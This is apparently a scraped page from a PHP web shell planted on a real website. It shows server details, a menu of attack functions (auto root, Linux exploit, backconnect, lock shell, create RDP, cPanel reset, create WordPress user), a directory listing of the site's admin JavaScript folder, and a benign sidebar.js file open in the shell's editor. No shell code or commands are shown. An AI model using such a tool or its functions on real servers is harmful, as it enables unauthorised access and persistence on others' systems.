Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.74
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
fastspeedlinks.com /
assets /
admin /
theme /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
apexchart
[ DIR ]
drwxr-xr-x
bookmark
[ DIR ]
drwxr-xr-x
chartist
[ DIR ]
drwxr-xr-x
chartjs
[ DIR ]
drwxr-xr-x
choices.js
[ DIR ]
drwxr-xr-x
clipboard
[ DIR ]
drwxr-xr-x
contacts
[ DIR ]
drwxr-xr-x
counter
[ DIR ]
drwxr-xr-x
custom-card
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
datatable
[ DIR ]
drwxr-xr-x
datepicker
[ DIR ]
drwxr-xr-x
dropzone
[ DIR ]
drwxr-xr-x
editor
[ DIR ]
drwxr-xr-x
emoji-js
[ DIR ]
drwxr-xr-x
filepond
[ DIR ]
drwxr-xr-x
form-wizard
[ DIR ]
drwxr-xr-x
fullcalendar
[ DIR ]
drwxr-xr-x
general-widget
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
img-cropper
[ DIR ]
drwxr-xr-x
jkanban
[ DIR ]
drwxr-xr-x
jsgrid
[ DIR ]
drwxr-xr-x
landing
[ DIR ]
drwxr-xr-x
letter-box
[ DIR ]
drwxr-xr-x
masonry
[ DIR ]
drwxr-xr-x
modal
[ DIR ]
drwxr-xr-x
notify
[ DIR ]
drwxr-xr-x
photoswipe
[ DIR ]
drwxr-xr-x
pikaday
[ DIR ]
drwxr-xr-x
prism
[ DIR ]
drwxr-xr-x
product
[ DIR ]
drwxr-xr-x
rangeslider
[ DIR ]
drwxr-xr-x
rating
[ DIR ]
drwxr-xr-x
scrollable
[ DIR ]
drwxr-xr-x
scrollbar
[ DIR ]
drwxr-xr-x
select2
[ DIR ]
drwxr-xr-x
sweetalert
[ DIR ]
drwxr-xr-x
swiper
[ DIR ]
drwxr-xr-x
theme-customizer
[ DIR ]
drwxr-xr-x
timeline
[ DIR ]
drwxr-xr-x
tree
[ DIR ]
drwxr-xr-x
two-factor
[ DIR ]
drwxr-xr-x
vector-map
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
widget
[ DIR ]
drwxr-xr-x
alert.js
755
B
-rw-r--r--
aos-init.js
11
B
-rw-r--r--
common-chat.js
1.92
KB
-rw-r--r--
config.js
977
B
-rw-r--r--
countdown.js
706
B
-rw-r--r--
custom-flatpickr.js
2.13
KB
-rw-r--r--
custom-quill.js
522
B
-rw-r--r--
datamap-custom.js
6.04
KB
-rw-r--r--
draggable-custom.js
148
B
-rw-r--r--
form-validation-custom.js
628
B
-rw-r--r--
gallery-mixin.js
87
B
-rw-r--r--
height-equal.js
885
B
-rw-r--r--
md-sidebar.js
361
B
-rw-r--r--
modernizr.js
7.34
KB
-rw-r--r--
password.js
572
B
-rw-r--r--
popover-custom.js
293
B
-rw-r--r--
print.js
60
B
-rw-r--r--
script.js
5.08
KB
-rw-r--r--
sidebar.js
7.44
KB
-rw-r--r--
support-custom.js
107
B
-rw-r--r--
tooltip-custom.js
294
B
-rw-r--r--
tour-custom.js
151
B
-rw-r--r--
translate-custom.js
3.54
KB
-rw-r--r--
validation-modal.js
606
B
-rw-r--r--
wow-custom.js
187
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.js
(function () { const body = document.querySelector("body"); const wrapper = document.querySelector(".page-wrapper"); // Get all the sidebar-list elements const sidebarListItems = document.querySelectorAll(".sidebar-link"); // Add onclick event listener to each sidebar-list item sidebarListItems.forEach((item) => { item.addEventListener("click", () => { item.classList.toggle("active"); const submenu = item .closest(".sidebar-list") .querySelector(".sidebar-submenu"); if (submenu) { submenu.style.display = item.classList.contains("active") ? "block" : "none"; } sidebarListItems.forEach((otherList) => { if (otherList !== item) { otherList.classList.remove("active"); const otherSubmenu = otherList .closest(".sidebar-list") .querySelector(".sidebar-submenu"); if (otherSubmenu) { otherSubmenu.style.display = "none"; } } }); }); }); // Get all the submenu-title elements const submenuTitles = document.querySelectorAll(".submenu-title"); // Add onclick event listener to each submenu-title item submenuTitles.forEach((title) => { title.addEventListener("click", () => { const parentLi = title.closest("li"); parentLi.classList.toggle("active"); const submenu = parentLi.querySelector(".according-submenu"); if (submenu) { submenu.style.display = submenu.style.display === "block" ? "none" : "block"; } submenuTitles.forEach((otherTitle) => { if (otherTitle !== title) { const otherParentLi = otherTitle.closest("li"); const otherSubmenu = otherParentLi.querySelector(".according-submenu"); if (otherSubmenu) { otherSubmenu.style.display = "none"; } otherParentLi.classList.remove("active"); } }); }); }); var url = window.location.href; const urlLink = url.includes("#") ? url.split("#")[0] : url; const submenuLinks = document.querySelectorAll(".sidebar-menu li a"); submenuLinks.forEach((el) => { var linkHref = el.href; if (urlLink === linkHref) { el.classList.add("active"); const submenu = el.closest(".sidebar-submenu"); if (submenu && submenu.previousElementSibling) { submenu.previousElementSibling.classList.add("active"); } if (submenu) { submenu.style.display = "block"; } const parentLi = el.closest(".sidebar-submenu > li"); if (parentLi) { parentLi.classList.add("active"); const submenu = parentLi.querySelector(".according-submenu"); if (submenu) { submenu.style.display = "block"; } } } }); const sidebarClose = document.querySelector(".sidebar-close"); if (sidebarClose) { sidebarClose.addEventListener("click", function () { wrapper.classList.add("sidebar-close"); Overlay.classList.remove("active"); }); } // Sidebar toggle js const sidebarToggle = document.querySelector(".toggle-sidebar"); sidebarToggle.addEventListener("click", function () { wrapper.classList.toggle("sidebar-close"); sidebarToggle.classList.toggle("close"); const wrapperClose = wrapper.classList.contains("sidebar-close"); }); // Sidebar pinned menu const pinTitle = document.querySelector(".pin-title"); let pinIcon = document.querySelectorAll(".sidebar-list .pinned-icon"); function togglePinnedName() { if (document.getElementsByClassName("pined").length) { if (!pinTitle.classList.contains("show")) pinTitle.classList.add("show"); } else { pinTitle.classList.remove("show"); } } pinIcon.forEach((item, index) => { var linkName = item.parentNode.querySelector("span").innerHTML; var InitialLocalStorage = JSON.parse(localStorage.getItem("pins") || false); if (InitialLocalStorage && InitialLocalStorage.includes(linkName)) { item.parentNode.classList.add("pined"); } item.addEventListener("click", (event) => { var localStoragePins = JSON.parse(localStorage.getItem("pins") || false); item.parentNode.classList.toggle("pined"); if (localStoragePins?.length) { if (item.parentNode.classList.contains("pined")) { !localStoragePins?.includes(linkName) && (localStoragePins = [...localStoragePins, linkName]); } else { localStoragePins?.includes(linkName) && localStoragePins.splice(localStoragePins.indexOf(linkName), 1); } localStorage.setItem("pins", JSON.stringify(localStoragePins)); } else { localStorage.setItem("pins", JSON.stringify([linkName])); } var elem = item; var topPos = elem.offsetTop; togglePinnedName(); setTimeout(() => { if (item.parentElement.parentElement.classList.contains("pined")) { scrollTo( document.getElementsByClassName("sidebar-menu")[0], topPos - 30, 600 ); } else { scrollTo( document.getElementsByClassName("sidebar-menu")[0], elem.parentNode.offsetTop - 30, 600 ); } }, 200); }); function scrollTo(element, to, duration) { var start = element.scrollTop, change = to - start, currentTime = 0, increment = 20; var animateScroll = function () { currentTime += increment; var val = Math.easeInOutQuad(currentTime, start, change, duration); element.scrollTop = val; if (currentTime < duration) { setTimeout(animateScroll, increment); } }; animateScroll(); } Math.easeInOutQuad = function (t, b, c, d) { t /= d / 2; if (t < 1) return (c / 2) * t * t + b; t--; return (-c / 2) * (t * (t - 2) - 1) + b; }; }); togglePinnedName(); })(); // product-page-js-start var toggleDataElements = document.querySelectorAll(".toggle-data"); toggleDataElements.forEach(function (element) { element.addEventListener("click", function () { var productWrapperElements = document.querySelectorAll(".product-wrapper"); productWrapperElements.forEach(function (wrapperElement) { wrapperElement.classList.toggle("sidebaron"); }); }); }); // product-page-js-end // RESPONSIVE SIDEBAR 1200< document.addEventListener("DOMContentLoaded", function () { "use strict"; var pageWrapper = document.querySelector(".page-wrapper"); var toggleSidebarButton = document.querySelector(".toggle-sidebar"); var widthWindow = window.innerWidth; if (widthWindow <= 1199) { pageWrapper.classList.add("sidebar-close"); toggleSidebarButton.classList.add("close"); } window.addEventListener("resize", function () { var widthWindow = window.innerWidth; if (widthWindow <= 1199) { pageWrapper.classList.add("sidebar-close"); toggleSidebarButton.classList.add("close"); } else { pageWrapper.classList.remove("sidebar-close"); toggleSidebarButton.classList.remove("close"); } }); }); // scrollTop sidebar in active link in JS $(document).ready(function () { var activeLink = $(".simplebar-wrapper .simplebar-content-wrapper a.active"); if ( activeLink.length > 0 && $("#pageWrapper").hasClass("compact-wrapper") ) { var scrollTop = activeLink.offset().top - 400; $(".simplebar-wrapper .simplebar-content-wrapper").animate( { scrollTop: scrollTop, }, 1000 ); } });
Close